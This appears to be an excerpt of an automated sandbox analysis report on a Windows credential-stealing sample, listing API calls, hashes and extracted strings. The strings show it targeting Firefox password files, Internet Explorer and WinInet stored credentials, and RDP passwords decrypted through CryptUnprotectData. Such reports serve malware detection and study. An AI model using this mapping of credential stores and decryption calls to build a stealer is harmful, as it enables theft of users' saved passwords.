                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: .xml
                  • API String ID: 1659193697-2937849440
                  • Opcode ID: 5612f15b83e4f5c0da68c40290cebea3554d9c95b9dfa89e0058544d4126d0e4
                  • Instruction ID: 09eced1d0fe3324484a059412de8bbb336304f1bc4f3e6890493b41d3b7db345
                  • Opcode Fuzzy Hash: 5612f15b83e4f5c0da68c40290cebea3554d9c95b9dfa89e0058544d4126d0e4
                  • Instruction Fuzzy Hash: 77F03A35900108FACF11EF91DD02ECDBB76AB15308F208176F211B51F0D7B95B64AB48
                  APIs
                  • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401D37
                  • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401D44
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitHandleProcess
                  • String ID:
                  • API String ID: 1046136549-0
                  • Opcode ID: 7fa46683cff65880fc07046521540c40611a923bba942e464b42245b21033316
                  • Instruction ID: 98c49b96a8b54ac0c31122d9ec1678d3f25e6b270c6518dc4dcec6e943226a25
                  • Opcode Fuzzy Hash: 7fa46683cff65880fc07046521540c40611a923bba942e464b42245b21033316
                  • Instruction Fuzzy Hash: E7E0BF7235024537FB315569EC83F5676985B12758F604433B641FD2D1D5FDF940826C
                  APIs
                  • GetTickCount.KERNEL32 ref: 0040FF99
                  • ExitProcess.KERNEL32(00000000), ref: 0040FFB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountExitProcessTick
                  • String ID:
                  • API String ID: 232575682-0
                  • Opcode ID: b844b7522c695be4dfb9276ea611e68d84ca933084dc7cddcdf456fcc53f69ad
                  • Instruction ID: 06dacf7b5bdf3065d43742cdf2570900850f9260e3093aa6ddbde68aacd5c01f
                  • Opcode Fuzzy Hash: b844b7522c695be4dfb9276ea611e68d84ca933084dc7cddcdf456fcc53f69ad
                  • Instruction Fuzzy Hash: FBC092A076C11349E2B87273094632E10035BE3708F65C03FF10A35DCA8DBC489E211F
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: ccf179241871f6042aa2775e6511bbdf144520f0f47ed731e2d5e649bf96b33e
                  • Instruction ID: 251c42277766ed9646b5a9c3b1c0fe41e3bd1f0ee4844d3e2f798b7a9c3cdedb
                  • Opcode Fuzzy Hash: ccf179241871f6042aa2775e6511bbdf144520f0f47ed731e2d5e649bf96b33e
                  • Instruction Fuzzy Hash: C4E0393291011AABCF20DAA89C01BDE77A8AB11368F044136B910E62E0E7B5DB50C7A9
                  APIs
                  • GetTickCount.KERNEL32 ref: 0040FF99
                  • ExitProcess.KERNEL32(00000000), ref: 0040FFB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountExitProcessTick
                  • String ID:
                  • API String ID: 232575682-0
                  • Opcode ID: db0779cbd658f11ac7167aa01f898edc599809d2dbb1fe85f57ab945cd90ea10
                  • Instruction ID: 002f6f85b3c0520e91da88d753ec90e409b49d1574653ab2620fa8804466fc11
                  • Opcode Fuzzy Hash: db0779cbd658f11ac7167aa01f898edc599809d2dbb1fe85f57ab945cd90ea10
                  • Instruction Fuzzy Hash: FCC0122072C34189C36153611C5538A3A120B97304F55C0BBD004258D6D478088A425F
                  APIs
                  • WSAStartup.WSOCK32(00000101,?), ref: 00403C2D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Startup
                  • String ID:
                  • API String ID: 724789610-0
                  • Opcode ID: 30164bad9e7e3c908d95e258457be95fc7c7aeee42e52043797345d1f1a8d3c3
                  • Instruction ID: 7b0ce69c0cb2004bd621d2ace6d0e8ba3c64a41308b07c2816557fadd6d817c3
                  • Opcode Fuzzy Hash: 30164bad9e7e3c908d95e258457be95fc7c7aeee42e52043797345d1f1a8d3c3
                  • Instruction Fuzzy Hash: 3FB0923161020836EA10A2958C439DA72AD4748708F4002A12A59D12C2EAEAEAC046EA
                  APIs
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401018
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID:
                  • API String ID: 2244384528-0
                  • Opcode ID: 86a8ec1850b9aaa514b9e5e89e8c94cfed7fea3bececbbbc2fb57b3281181469
                  • Instruction ID: 28e71356e360ca3db6ee0d43e78b0f0bf00f1f89270a16bc3e7bce26a30f1f77
                  • Opcode Fuzzy Hash: 86a8ec1850b9aaa514b9e5e89e8c94cfed7fea3bececbbbc2fb57b3281181469
                  • Instruction Fuzzy Hash: 27A022323C020032EE00AB80AC03FCC2C020BA8B8CF00C002BB082C0C0C8FAC0E2A22A
                  APIs
                  • LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocal
                  • String ID:
                  • API String ID: 2826327444-0
                  • Opcode ID: 137a773f6ae48b6ee33adf6dcf8c71acbe3b08eb172555d78977b267df3d9f64
                  • Instruction ID: 0a405eb3ea2237b8c7d3b2374792eb0735da3c41d5461f0553682d87d0295bc0
                  • Opcode Fuzzy Hash: 137a773f6ae48b6ee33adf6dcf8c71acbe3b08eb172555d78977b267df3d9f64
                  • Instruction Fuzzy Hash: C5C02B3100010D91C7113E34C949B4A39C4572034CF0080323508A08F0C678C690C1C8
                  APIs
                  • LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocLocal
                  • String ID:
                  • API String ID: 3494564517-0
                  • Opcode ID: 175009169b3b3cea6a064c991676caba20ef80de107dd71c414f8110d5986276
                  • Instruction ID: 0d23249a0e78e6512e579298220552806d91460745143d34d93349aebd84a825
                  • Opcode Fuzzy Hash: 175009169b3b3cea6a064c991676caba20ef80de107dd71c414f8110d5986276
                  • Instruction Fuzzy Hash: 84B092A120030826E250A649D803F1AB28C9B11B4CF008032BB44E62C2C9B8F91481AD
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00409484
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 004094B1
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 004094CE
                  • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409664
                  • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409677
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                  • API String ID: 3040542784-1405255088
                  • Opcode ID: f0f0ab89c6ef816c1f5cdb2bcce169c3b320ecfc182607a20e6cbbfd06447570
                  • Instruction ID: f078e26bfb360da23a87b834dff21d2cd796a551ffced0913c93ca374c7af2dc
                  • Opcode Fuzzy Hash: f0f0ab89c6ef816c1f5cdb2bcce169c3b320ecfc182607a20e6cbbfd06447570
                  • Instruction Fuzzy Hash: DC513F70914209BADF21BF61DD02EEA7A75AF04308F1044B7B908B11F2D7BE9E919B5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: explorer.exe
                  • API String ID: 0-3187896405
                  • Opcode ID: c2717998afd40274a0e18a5117ed09a6326ae842430f85bb60fcf48e658aaa65
                  • Instruction ID: 339f67933faa4902912e8113d0e12cd211fbe269d324ef67944da57c1fce070e
                  • Opcode Fuzzy Hash: c2717998afd40274a0e18a5117ed09a6326ae842430f85bb60fcf48e658aaa65
                  • Instruction Fuzzy Hash: 7C317230A04218ABEF229BA1DE49BEE7AB5AB04344F0045B7E104B11E1DBF95E84DF59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 123456
                  • API String ID: 0-158520161
                  • Opcode ID: 2c5fbe4573f16d8fab2cf4876be527e79393b4457eed74dee052666c98a27ef3
                  • Instruction ID: 885172f44155ff4289d4fb693edf733573c9f98d175cf26bc1040d56c290aa1b
                  • Opcode Fuzzy Hash: 2c5fbe4573f16d8fab2cf4876be527e79393b4457eed74dee052666c98a27ef3
                  • Instruction Fuzzy Hash: B6514F31900209EAEF219F91DD46BDDBFB5FF04348F148076E600B55E2D7B98A48DB68
                  APIs
                    • Part of subcall function 00409E8B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409EC4
                    • Part of subcall function 00409E8B: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409ECD
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A16D
                  • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A1F7
                  • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A216
                  • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A235
                  • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A24E
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A294
                  • LocalFree.KERNEL32(?), ref: 0040A2C1
                  • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A2EB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                  • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                  • API String ID: 2957877119-3076635702
                  • Opcode ID: feb5cb5b94d68b1118f19efbded5a9befba7026c3d79461e7fe2bf79bfc015a0
                  • Instruction ID: f401766838be715e7df61eb103f318295b24ae2e2e23771a2c77150a89ec6b22
                  • Opcode Fuzzy Hash: feb5cb5b94d68b1118f19efbded5a9befba7026c3d79461e7fe2bf79bfc015a0
                  • Instruction Fuzzy Hash: 2A41097190021DEADF219F50CC06FDA7BB9BF08304F0480EAB644B5191DB7A9AE59FD9
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040B8CF
                  • LocalFree.KERNEL32(00000000,?), ref: 0040B90A
                  • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B94B
                  • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B959
                  • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B967
                  • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B975
                  • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B983
                  • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040B991
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotect
                  • String ID: ftp://$http://$https://
                  • API String ID: 3968356742-2804853444
                  • Opcode ID: cc6fa941d3240ba3dffb52b22ee328574de5633c9d4cb607f2d79f4d50549dae
                  • Instruction ID: b19ace0abd7eac20551f2d5fc40b49bbbced65cf98b86b072bc85626dd3b29c5
                  • Opcode Fuzzy Hash: cc6fa941d3240ba3dffb52b22ee328574de5633c9d4cb607f2d79f4d50549dae
                  • Instruction Fuzzy Hash: BF51E672900109FACF12AFD1EC42EEE7B7AEB44309F108037F611B50A1D77A5A54DB59
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 004085B3
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 004085DC
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 004085F9
                  • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 004086A0
                  • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 004086B3
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: dee79c63cfed158fb1c5fb456c9f386bd851ae0be0562eccb3adeea9a6142c65
                  • Instruction ID: de00ff37c846c8476ad0b937f69e9334585cc62ec1e68734680259d3cbd4a832
                  • Opcode Fuzzy Hash: dee79c63cfed158fb1c5fb456c9f386bd851ae0be0562eccb3adeea9a6142c65
                  • Instruction Fuzzy Hash: 69314470500209AADF11AB61DD01EEE77B9AF04304F1049BBB948B51F1DB799ED09A58
                  APIs
                  • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A5C1
                  • lstrlenW.KERNEL32(00413275,?,?,00000000), ref: 0040A5FF
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A62F
                  • LocalFree.KERNEL32(00000000), ref: 0040A661
                  • CredFree.ADVAPI32(00000000), ref: 0040A67F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                  • String ID: Microsoft_WinInet_*$u2A
                  • API String ID: 3891647360-1717749884
                  • Opcode ID: f2b9b52f09b627ba91158a8d4e26bef8a4bcd467c37c94d826325fd16cc1659b
                  • Instruction ID: a7d8e005c27115d7c2d26dd6ef0ae6fc1f38b51df9cf3295d8c3d9fd3ebbafd4
                  • Opcode Fuzzy Hash: f2b9b52f09b627ba91158a8d4e26bef8a4bcd467c37c94d826325fd16cc1659b
                  • Instruction Fuzzy Hash: B5312B71800209EADF209F90DC05BEEBBB8BB04305F184576E641B12E0D7BA5A94CB9A
                  APIs
                  • lstrlen.KERNEL32(00000000), ref: 0040CAC4
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CB2A
                  • LocalFree.KERNEL32(00000000), ref: 0040CB51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID: full address:s:$password 51:b:$username:s:
                  • API String ID: 2920030623-2945746679
                  • Opcode ID: 5a4aa130149a7864f96d2caa5a8bd5db8e6769597c0901092ac328538414656e
                  • Instruction ID: fa303a7f78ff015c66e7f5f047ee1bd5f96a69690f6c653c9b76103944328498
                  • Opcode Fuzzy Hash: 5a4aa130149a7864f96d2caa5a8bd5db8e6769597c0901092ac328538414656e
                  • Instruction Fuzzy Hash: 93415C32D00109EADF21ABE5D846BEEBB75EB44314F10013BF200711E0D7B95A92DB9D
                  APIs
                  • lstrlen.KERNEL32(?), ref: 0040A71B
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A7D3
                  • LocalFree.KERNEL32(00000000), ref: 0040A806
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID:
                  • API String ID: 2920030623-0
                  • Opcode ID: 8c3423fde507b97bc5dc80952f4c4f7a43aaee8c73ae507500d09105da1b5f30
                  • Instruction ID: 83b7a2fcf0e51bbc56470a161055dde31258554073f6f43092e3c13268cc997d
                  • Opcode Fuzzy Hash: 8c3423fde507b97bc5dc80952f4c4f7a43aaee8c73ae507500d09105da1b5f30
                  • Instruction Fuzzy Hash: 0E31B3376002099BEF20AE54D844BCEB775EB85364F10C137EA50A72C0D27CDA56CB5E
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040414E
                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040416A
                  • FreeSid.ADVAPI32(?), ref: 0040417E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 8875248de65d89068c49fc9c91a7eb01479aeaa87efd2b03388409123db240e4
                  • Instruction ID: fcca649b5c9b222fb78caba8243c0119fbbb0da3718ef36efae507d1f91828ab
                  • Opcode Fuzzy Hash: 8875248de65d89068c49fc9c91a7eb01479aeaa87efd2b03388409123db240e4
                  • Instruction Fuzzy Hash: E0116170604288DEEB11CB94DC0EFDA7FF4AB5034CF0885A5D250EA2F2D3B89548C75A
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404045
                  • LocalFree.KERNEL32(00000000), ref: 00404079
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotect
                  • String ID:
                  • API String ID: 1561624719-0
                  • Opcode ID: 1d3115f653053ecefc300207beb17d1587e5c5b299ee93d5987816e0cda49adf
                  • Instruction ID: 002495ce28a5764f73250fbc4ec026de7f96150d115926febcdcd66189658153
                  • Opcode Fuzzy Hash: 1d3115f653053ecefc300207beb17d1587e5c5b299ee93d5987816e0cda49adf
                  • Instruction Fuzzy Hash: FE110775A00219EBDB15CE94C845BDE7B74FB44351F008466A611762E0C3B9AA40CB45
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                  • Instruction ID: 3c78efb6b6252997e37dba53990d4c41ba62dc3b41e308827f1f696989bfbd42
                  • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                  • Instruction Fuzzy Hash: 8B121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 03deaa5e7ac288ae455c8890013846e685306e418c958c7845be627a36af68f0
                  • Instruction ID: fef48ed7f26f4b91a03165647bc533b2e212d921c779cbc8725f1bb403e01c98
                  • Opcode Fuzzy Hash: 03deaa5e7ac288ae455c8890013846e685306e418c958c7845be627a36af68f0
                  • Instruction Fuzzy Hash: 1D71C137F505364BE7588DAA8981195F7D2ABC8320B1F827ECE19F7381C9B4BD1286C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                  • API String ID: 0-1526611526
                  • Opcode ID: 75be8d959a3ef46cda475649a3b2f5335f473a6aae9f3cf828271b51f02723bf
                  • Instruction ID: 20c96ff4ef7ca75ed0c1a3f9f91715f39d6713f9170a09e911abe15c08339f7d
                  • Opcode Fuzzy Hash: 75be8d959a3ef46cda475649a3b2f5335f473a6aae9f3cf828271b51f02723bf
